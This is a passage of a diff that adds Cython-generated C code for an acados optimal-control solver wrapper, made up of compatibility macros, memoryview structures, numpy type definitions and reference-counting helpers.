__Pyx_NewRef(x) : PyNumber_Long(x)) +#else +#define __Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Int(x)) +#endif +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_VERSION_HEX >= 0x030C00A7 + #ifndef _PyLong_SIGN_MASK + #define _PyLong_SIGN_MASK 3 + #endif + #ifndef _PyLong_NON_SIZE_BITS + #define _PyLong_NON_SIZE_BITS 3 + #endif + #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) + #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) + #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) + #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) + #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_SignedDigitCount(x)\ + ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) + #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) + #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) + #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) + #else + #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) + #endif + typedef Py_ssize_t __Pyx_compact_pylong; + typedef size_t __Pyx_compact_upylong; + #else // Py < 3.12 + #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) + #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) + #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) + #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 0 : __Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) + #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) + #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) + #define __Pyx_PyLong_CompactValue(x)\ + ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) + typedef sdigit __Pyx_compact_pylong; + typedef digit __Pyx_compact_upylong; + #endif + #if PY_VERSION_HEX >= 0x030C00A5 + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) + #else + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) + #endif +#endif +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII +static int __Pyx_sys_getdefaultencoding_not_ascii; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + PyObject* ascii_chars_u = NULL; + PyObject* ascii_chars_b = NULL; + const char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + if (strcmp(default_encoding_c, "ascii") == 0) { + __Pyx_sys_getdefaultencoding_not_ascii = 0; + } else { + char ascii_chars[128]; + int c; + for (c = 0; c < 128; c++) { + ascii_chars[c] = (char) c; + } + __Pyx_sys_getdefaultencoding_not_ascii = 1; + ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); + if (!ascii_chars_u) goto bad; + ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); + if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { + PyErr_Format( + PyExc_ValueError, + "This module compiled with c_string_encoding=ascii, but default encoding '%.200s' is not a superset of ascii.", + default_encoding_c); + goto bad; + } + Py_DECREF(ascii_chars_u); + Py_DECREF(ascii_chars_b); + } + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + Py_XDECREF(ascii_chars_u); + Py_XDECREF(ascii_chars_b); + return -1; +} +#endif +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) +#else +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +static char* __PYX_DEFAULT_STRING_ENCODING; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); + if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; + strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + return -1; +} +#endif +#endif + + +/* Test for GCC > 2.95 */ +#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) + #define likely(x) __builtin_expect(!!(x), 1) + #define unlikely(x) __builtin_expect(!!(x), 0) +#else /* !__GNUC__ or GCC < 2.95 */ + #define likely(x) (x) + #define unlikely(x) (x) +#endif /* __GNUC__ */ +static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } + +#if !CYTHON_USE_MODULE_STATE +static PyObject *__pyx_m = NULL; +#endif +static int __pyx_lineno; +static int __pyx_clineno = 0; +static const char * __pyx_cfilenm = __FILE__; +static const char *__pyx_filename; + +/* Header.proto */ +#if !defined(CYTHON_CCOMPLEX) + #if defined(__cplusplus) + #define CYTHON_CCOMPLEX 1 + #elif (defined(_Complex_I) && !defined(_MSC_VER)) || ((defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L) && !defined(__STDC_NO_COMPLEX__)) + #define CYTHON_CCOMPLEX 1 + #else + #define CYTHON_CCOMPLEX 0 + #endif +#endif +#if CYTHON_CCOMPLEX + #ifdef __cplusplus + #include + #else + #include + #endif +#endif +#if CYTHON_CCOMPLEX && !defined(__cplusplus) && defined(__sun__) && defined(__GNUC__) + #undef _Complex_I + #define _Complex_I 1.0fj +#endif + +/* #### Code section: filename_table ### */ + +static const char *__pyx_f[] = { + "third_party/acados/acados_template/acados_ocp_solver_pyx.pyx", + "", + "__init__.cython-30.pxd", + "type.pxd", +}; +/* #### Code section: utility_code_proto_before_types ### */ +/* ForceInitThreads.proto */ +#ifndef __PYX_FORCE_INIT_THREADS + #define __PYX_FORCE_INIT_THREADS 0 +#endif + +/* NoFastGil.proto */ +#define __Pyx_PyGILState_Ensure PyGILState_Ensure +#define __Pyx_PyGILState_Release PyGILState_Release +#define __Pyx_FastGIL_Remember() +#define __Pyx_FastGIL_Forget() +#define __Pyx_FastGilFuncInit() + +/* BufferFormatStructs.proto */ +struct __Pyx_StructField_; +#define __PYX_BUF_FLAGS_PACKED_STRUCT (1 << 0) +typedef struct { + const char* name; + struct __Pyx_StructField_* fields; + size_t size; + size_t arraysize[8]; + int ndim; + char typegroup; + char is_unsigned; + int flags; +} __Pyx_TypeInfo; +typedef struct __Pyx_StructField_ { + __Pyx_TypeInfo* type; + const char* name; + size_t offset; +} __Pyx_StructField; +typedef struct { + __Pyx_StructField* field; + size_t parent_offset; +} __Pyx_BufFmt_StackElem; +typedef struct { + __Pyx_StructField root; + __Pyx_BufFmt_StackElem* head; + size_t fmt_offset; + size_t new_count, enc_count; + size_t struct_alignment; + int is_complex; + char enc_type; + char new_packmode; + char enc_packmode; + char is_valid_array; +} __Pyx_BufFmt_Context; + +/* Atomics.proto */ +#include +#ifndef CYTHON_ATOMICS + #define CYTHON_ATOMICS 1 +#endif +#define __PYX_CYTHON_ATOMICS_ENABLED() CYTHON_ATOMICS +#define __pyx_atomic_int_type int +#define __pyx_nonatomic_int_type int +#if CYTHON_ATOMICS && (defined(__STDC_VERSION__) &&\ + (__STDC_VERSION__ >= 201112L) &&\ + !defined(__STDC_NO_ATOMICS__)) + #include +#elif CYTHON_ATOMICS && (defined(__cplusplus) && (\ + (__cplusplus >= 201103L) ||\ + (defined(_MSC_VER) && _MSC_VER >= 1700))) + #include +#endif +#if CYTHON_ATOMICS && (defined(__STDC_VERSION__) &&\ + (__STDC_VERSION__ >= 201112L) &&\ + !defined(__STDC_NO_ATOMICS__) &&\ + ATOMIC_INT_LOCK_FREE == 2) + #undef __pyx_atomic_int_type + #define __pyx_atomic_int_type atomic_int + #define __pyx_atomic_incr_aligned(value) atomic_fetch_add_explicit(value, 1, memory_order_relaxed) + #define __pyx_atomic_decr_aligned(value) atomic_fetch_sub_explicit(value, 1, memory_order_acq_rel) + #if defined(__PYX_DEBUG_ATOMICS) && defined(_MSC_VER) + #pragma message ("Using standard C atomics") + #elif defined(__PYX_DEBUG_ATOMICS) + #warning "Using standard C atomics" + #endif +#elif CYTHON_ATOMICS && (defined(__cplusplus) && (\ + (__cplusplus >= 201103L) ||\ +\ + (defined(_MSC_VER) && _MSC_VER >= 1700)) &&\ + ATOMIC_INT_LOCK_FREE == 2) + #undef __pyx_atomic_int_type + #define __pyx_atomic_int_type std::atomic_int + #define __pyx_atomic_incr_aligned(value) std::atomic_fetch_add_explicit(value, 1, std::memory_order_relaxed) + #define __pyx_atomic_decr_aligned(value) std::atomic_fetch_sub_explicit(value, 1, std::memory_order_acq_rel) + #if defined(__PYX_DEBUG_ATOMICS) && defined(_MSC_VER) + #pragma message ("Using standard C++ atomics") + #elif defined(__PYX_DEBUG_ATOMICS) + #warning "Using standard C++ atomics" + #endif +#elif CYTHON_ATOMICS && (__GNUC__ >= 5 || (__GNUC__ == 4 &&\ + (__GNUC_MINOR__ > 1 ||\ + (__GNUC_MINOR__ == 1 && __GNUC_PATCHLEVEL__ >= 2)))) + #define __pyx_atomic_incr_aligned(value) __sync_fetch_and_add(value, 1) + #define __pyx_atomic_decr_aligned(value) __sync_fetch_and_sub(value, 1) + #ifdef __PYX_DEBUG_ATOMICS + #warning "Using GNU atomics" + #endif +#elif CYTHON_ATOMICS && defined(_MSC_VER) + #include + #undef __pyx_atomic_int_type + #define __pyx_atomic_int_type long + #define __pyx_nonatomic_int_type long + #pragma intrinsic (_InterlockedExchangeAdd) + #define __pyx_atomic_incr_aligned(value) _InterlockedExchangeAdd(value, 1) + #define __pyx_atomic_decr_aligned(value) _InterlockedExchangeAdd(value, -1) + #ifdef __PYX_DEBUG_ATOMICS + #pragma message ("Using MSVC atomics") + #endif +#else + #undef CYTHON_ATOMICS + #define CYTHON_ATOMICS 0 + #ifdef __PYX_DEBUG_ATOMICS + #warning "Not using atomics" + #endif +#endif +#if CYTHON_ATOMICS + #define __pyx_add_acquisition_count(memview)\ + __pyx_atomic_incr_aligned(__pyx_get_slice_count_pointer(memview)) + #define __pyx_sub_acquisition_count(memview)\ + __pyx_atomic_decr_aligned(__pyx_get_slice_count_pointer(memview)) +#else + #define __pyx_add_acquisition_count(memview)\ + __pyx_add_acquisition_count_locked(__pyx_get_slice_count_pointer(memview), memview->lock) + #define __pyx_sub_acquisition_count(memview)\ + __pyx_sub_acquisition_count_locked(__pyx_get_slice_count_pointer(memview), memview->lock) +#endif + +/* MemviewSliceStruct.proto */ +struct __pyx_memoryview_obj; +typedef struct { + struct __pyx_memoryview_obj *memview; + char *data; + Py_ssize_t shape[8]; + Py_ssize_t strides[8]; + Py_ssize_t suboffsets[8]; +} __Pyx_memviewslice; +#define __Pyx_MemoryView_Len(m) (m.shape[0]) + +/* #### Code section: numeric_typedefs ### */ + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":731 + * # in Cython to enable them only on the right systems. + * + * ctypedef npy_int8 int8_t # <<<<<<<<<<<<<< + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t + */ +typedef npy_int8 __pyx_t_5numpy_int8_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":732 + * + * ctypedef npy_int8 int8_t + * ctypedef npy_int16 int16_t # <<<<<<<<<<<<<< + * ctypedef npy_int32 int32_t + * ctypedef npy_int64 int64_t + */ +typedef npy_int16 __pyx_t_5numpy_int16_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":733 + * ctypedef npy_int8 int8_t + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t # <<<<<<<<<<<<<< + * ctypedef npy_int64 int64_t + * #ctypedef npy_int96 int96_t + */ +typedef npy_int32 __pyx_t_5numpy_int32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":734 + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t + * ctypedef npy_int64 int64_t # <<<<<<<<<<<<<< + * #ctypedef npy_int96 int96_t + * #ctypedef npy_int128 int128_t + */ +typedef npy_int64 __pyx_t_5numpy_int64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":738 + * #ctypedef npy_int128 int128_t + * + * ctypedef npy_uint8 uint8_t # <<<<<<<<<<<<<< + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t + */ +typedef npy_uint8 __pyx_t_5numpy_uint8_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":739 + * + * ctypedef npy_uint8 uint8_t + * ctypedef npy_uint16 uint16_t # <<<<<<<<<<<<<< + * ctypedef npy_uint32 uint32_t + * ctypedef npy_uint64 uint64_t + */ +typedef npy_uint16 __pyx_t_5numpy_uint16_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":740 + * ctypedef npy_uint8 uint8_t + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t # <<<<<<<<<<<<<< + * ctypedef npy_uint64 uint64_t + * #ctypedef npy_uint96 uint96_t + */ +typedef npy_uint32 __pyx_t_5numpy_uint32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":741 + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t + * ctypedef npy_uint64 uint64_t # <<<<<<<<<<<<<< + * #ctypedef npy_uint96 uint96_t + * #ctypedef npy_uint128 uint128_t + */ +typedef npy_uint64 __pyx_t_5numpy_uint64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":745 + * #ctypedef npy_uint128 uint128_t + * + * ctypedef npy_float32 float32_t # <<<<<<<<<<<<<< + * ctypedef npy_float64 float64_t + * #ctypedef npy_float80 float80_t + */ +typedef npy_float32 __pyx_t_5numpy_float32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":746 + * + * ctypedef npy_float32 float32_t + * ctypedef npy_float64 float64_t # <<<<<<<<<<<<<< + * #ctypedef npy_float80 float80_t + * #ctypedef npy_float128 float128_t + */ +typedef npy_float64 __pyx_t_5numpy_float64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":755 + * # The int types are mapped a bit surprising -- + * # numpy.int corresponds to 'l' and numpy.long to 'q' + * ctypedef npy_long int_t # <<<<<<<<<<<<<< + * ctypedef npy_longlong long_t + * ctypedef npy_longlong longlong_t + */ +typedef npy_long __pyx_t_5numpy_int_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":756 + * # numpy.int corresponds to 'l' and numpy.long to 'q' + * ctypedef npy_long int_t + * ctypedef npy_longlong long_t # <<<<<<<<<<<<<< + * ctypedef npy_longlong longlong_t + * + */ +typedef npy_longlong __pyx_t_5numpy_long_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":757 + * ctypedef npy_long int_t + * ctypedef npy_longlong long_t + * ctypedef npy_longlong longlong_t # <<<<<<<<<<<<<< + * + * ctypedef npy_ulong uint_t + */ +typedef npy_longlong __pyx_t_5numpy_longlong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":759 + * ctypedef npy_longlong longlong_t + * + * ctypedef npy_ulong uint_t # <<<<<<<<<<<<<< + * ctypedef npy_ulonglong ulong_t + * ctypedef npy_ulonglong ulonglong_t + */ +typedef npy_ulong __pyx_t_5numpy_uint_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":760 + * + * ctypedef npy_ulong uint_t + * ctypedef npy_ulonglong ulong_t # <<<<<<<<<<<<<< + * ctypedef npy_ulonglong ulonglong_t + * + */ +typedef npy_ulonglong __pyx_t_5numpy_ulong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":761 + * ctypedef npy_ulong uint_t + * ctypedef npy_ulonglong ulong_t + * ctypedef npy_ulonglong ulonglong_t # <<<<<<<<<<<<<< + * + * ctypedef npy_intp intp_t + */ +typedef npy_ulonglong __pyx_t_5numpy_ulonglong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":763 + * ctypedef npy_ulonglong ulonglong_t + * + * ctypedef npy_intp intp_t # <<<<<<<<<<<<<< + * ctypedef npy_uintp uintp_t + * + */ +typedef npy_intp __pyx_t_5numpy_intp_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":764 + * + * ctypedef npy_intp intp_t + * ctypedef npy_uintp uintp_t # <<<<<<<<<<<<<< + * + * ctypedef npy_double float_t + */ +typedef npy_uintp __pyx_t_5numpy_uintp_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":766 + * ctypedef npy_uintp uintp_t + * + * ctypedef npy_double float_t # <<<<<<<<<<<<<< + * ctypedef npy_double double_t + * ctypedef npy_longdouble longdouble_t + */ +typedef npy_double __pyx_t_5numpy_float_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":767 + * + * ctypedef npy_double float_t + * ctypedef npy_double double_t # <<<<<<<<<<<<<< + * ctypedef npy_longdouble longdouble_t + * + */ +typedef npy_double __pyx_t_5numpy_double_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":768 + * ctypedef npy_double float_t + * ctypedef npy_double double_t + * ctypedef npy_longdouble longdouble_t # <<<<<<<<<<<<<< + * + * ctypedef npy_cfloat cfloat_t + */ +typedef npy_longdouble __pyx_t_5numpy_longdouble_t; +/* #### Code section: complex_type_declarations ### */ +/* Declarations.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + typedef ::std::complex< float > __pyx_t_float_complex; + #else + typedef float _Complex __pyx_t_float_complex; + #endif +#else + typedef struct { float real, imag; } __pyx_t_float_complex; +#endif +static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float, float); + +/* Declarations.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + typedef ::std::complex< double > __pyx_t_double_complex; + #else + typedef double _Complex __pyx_t_double_complex; + #endif +#else + typedef struct { double real, imag; } __pyx_t_double_complex; +#endif +static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double, double); + +/* #### Code section: type_declarations ### */ + +/*--- Type declarations ---*/ +struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython; +struct __pyx_array_obj; +struct __pyx_MemviewEnum_obj; +struct __pyx_memoryview_obj; +struct __pyx_memoryviewslice_obj; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":770 + * ctypedef npy_longdouble longdouble_t + * + * ctypedef npy_cfloat cfloat_t # <<<<<<<<<<<<<< + * ctypedef npy_cdouble cdouble_t + * ctypedef npy_clongdouble clongdouble_t + */ +typedef npy_cfloat __pyx_t_5numpy_cfloat_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":771 + * + * ctypedef npy_cfloat cfloat_t + * ctypedef npy_cdouble cdouble_t # <<<<<<<<<<<<<< + * ctypedef npy_clongdouble clongdouble_t + * + */ +typedef npy_cdouble __pyx_t_5numpy_cdouble_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":772 + * ctypedef npy_cfloat cfloat_t + * ctypedef npy_cdouble cdouble_t + * ctypedef npy_clongdouble clongdouble_t # <<<<<<<<<<<<<< + * + * ctypedef npy_cdouble complex_t + */ +typedef npy_clongdouble __pyx_t_5numpy_clongdouble_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":774 + * ctypedef npy_clongdouble clongdouble_t + * + * ctypedef npy_cdouble complex_t # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew1(a): + */ +typedef npy_cdouble __pyx_t_5numpy_complex_t; + +/* "acados_template/acados_ocp_solver_pyx.pyx":52 + * + * + * cdef class AcadosOcpSolverCython: # <<<<<<<<<<<<<< + * """ + * Class to interact with the acados ocp solver C object. + */ +struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython { + PyObject_HEAD + lat_solver_capsule *capsule; + void *nlp_opts; + ocp_nlp_dims *nlp_dims; + ocp_nlp_config *nlp_config; + ocp_nlp_out *nlp_out; + ocp_nlp_out *sens_out; + ocp_nlp_in *nlp_in; + ocp_nlp_solver *nlp_solver; + int status; + int solver_created; + PyObject *model_name; + int N; + PyObject *nlp_solver_type; +}; + + +/* "View.MemoryView":114 + * @cython.collection_type("sequence") + * @cname("__pyx_array") + * cdef class array: # <<<<<<<<<<<<<< + * + * cdef: + */ +struct __pyx_array_obj { + PyObject_HEAD + struct __pyx_vtabstruct_array *__pyx_vtab; + char *data; + Py_ssize_t len; + char *format; + int ndim; + Py_ssize_t *_shape; + Py_ssize_t *_strides; + Py_ssize_t itemsize; + PyObject *mode; + PyObject *_format; + void (*callback_free_data)(void *); + int free_data; + int dtype_is_object; +}; + + +/* "View.MemoryView":302 + * + * @cname('__pyx_MemviewEnum') + * cdef class Enum(object): # <<<<<<<<<<<<<< + * cdef object name + * def __init__(self, name): + */ +struct __pyx_MemviewEnum_obj { + PyObject_HEAD + PyObject *name; +}; + + +/* "View.MemoryView":337 + * + * @cname('__pyx_memoryview') + * cdef class memoryview: # <<<<<<<<<<<<<< + * + * cdef object obj + */ +struct __pyx_memoryview_obj { + PyObject_HEAD + struct __pyx_vtabstruct_memoryview *__pyx_vtab; + PyObject *obj; + PyObject *_size; + PyObject *_array_interface; + PyThread_type_lock lock; + __pyx_atomic_int_type acquisition_count; + Py_buffer view; + int flags; + int dtype_is_object; + __Pyx_TypeInfo *typeinfo; +}; + + +/* "View.MemoryView":952 + * @cython.collection_type("sequence") + * @cname('__pyx_memoryviewslice') + * cdef class _memoryviewslice(memoryview): # <<<<<<<<<<<<<< + * "Internal class for passing memoryview slices to Python" + * + */ +struct __pyx_memoryviewslice_obj { + struct __pyx_memoryview_obj __pyx_base; + __Pyx_memviewslice from_slice; + PyObject *from_object; + PyObject *(*to_object_func)(char *); + int (*to_dtype_func)(char *, PyObject *); +}; + + + +/* "View.MemoryView":114 + * @cython.collection_type("sequence") + * @cname("__pyx_array") + * cdef class array: # <<<<<<<<<<<<<< + * + * cdef: + */ + +struct __pyx_vtabstruct_array { + PyObject *(*get_memview)(struct __pyx_array_obj *); +}; +static struct __pyx_vtabstruct_array *__pyx_vtabptr_array; + + +/* "View.MemoryView":337 + * + * @cname('__pyx_memoryview') + * cdef class memoryview: # <<<<<<<<<<<<<< + * + * cdef object obj + */ + +struct __pyx_vtabstruct_memoryview { + char *(*get_item_pointer)(struct __pyx_memoryview_obj *, PyObject *); + PyObject *(*is_slice)(struct __pyx_memoryview_obj *, PyObject *); + PyObject *(*setitem_slice_assignment)(struct __pyx_memoryview_obj *, PyObject *, PyObject *); + PyObject *(*setitem_slice_assign_scalar)(struct __pyx_memoryview_obj *, struct __pyx_memoryview_obj *, PyObject *); + PyObject *(*setitem_indexed)(struct __pyx_memoryview_obj *, PyObject *, PyObject *); + PyObject *(*convert_item_to_object)(struct __pyx_memoryview_obj *, char *); + PyObject *(*assign_item_from_object)(struct __pyx_memoryview_obj *, char *, PyObject *); + PyObject *(*_get_base)(struct __pyx_memoryview_obj *); +}; +static struct __pyx_vtabstruct_memoryview *__pyx_vtabptr_memoryview; + + +/* "View.MemoryView":952 + * @cython.collection_type("sequence") + * @cname('__pyx_memoryviewslice') + * cdef class _memoryviewslice(memoryview): # <<<<<<<<<<<<<< + * "Internal class for passing memoryview slices to Python" + * + */ + +struct __pyx_vtabstruct__memoryviewslice { + struct __pyx_vtabstruct_memoryview __pyx_base; +}; +static struct __pyx_vtabstruct__memoryviewslice *__pyx_vtabptr__memoryviewslice; +/* #### Code section: utility_code_proto ### */ + +/* --- Runtime support code (head) --- */ +/* Refnanny.proto */ +#ifndef CYTHON_REFNANNY + #define CYTHON_REFNANNY 0 +#endif +#if CYTHON_REFNANNY + typedef struct { + void (*INCREF)(void*, PyObject*, Py_ssize_t); + void (*DECREF)(void*, PyObject*, Py_ssize_t); + void (*GOTREF)(void*, PyObject*, Py_ssize_t); + void (*GIVEREF)(void*, PyObject*, Py_ssize_t); + void* (*SetupContext)(const char*, Py_ssize_t, const char*); + void (*FinishContext)(void**); + } __Pyx_RefNannyAPIStruct; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); + #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; +#ifdef WITH_THREAD + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + if (acquire_gil) {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + PyGILState_Release(__pyx_gilstate_save);\ + } else {\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + } + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } +#else + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) + #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() +#endif + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } + #define __Pyx_RefNannyFinishContext()\ + __Pyx_RefNanny->FinishContext(&__pyx_refnanny) + #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) + #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); }} while(0) + #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) + #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) +#else + #define 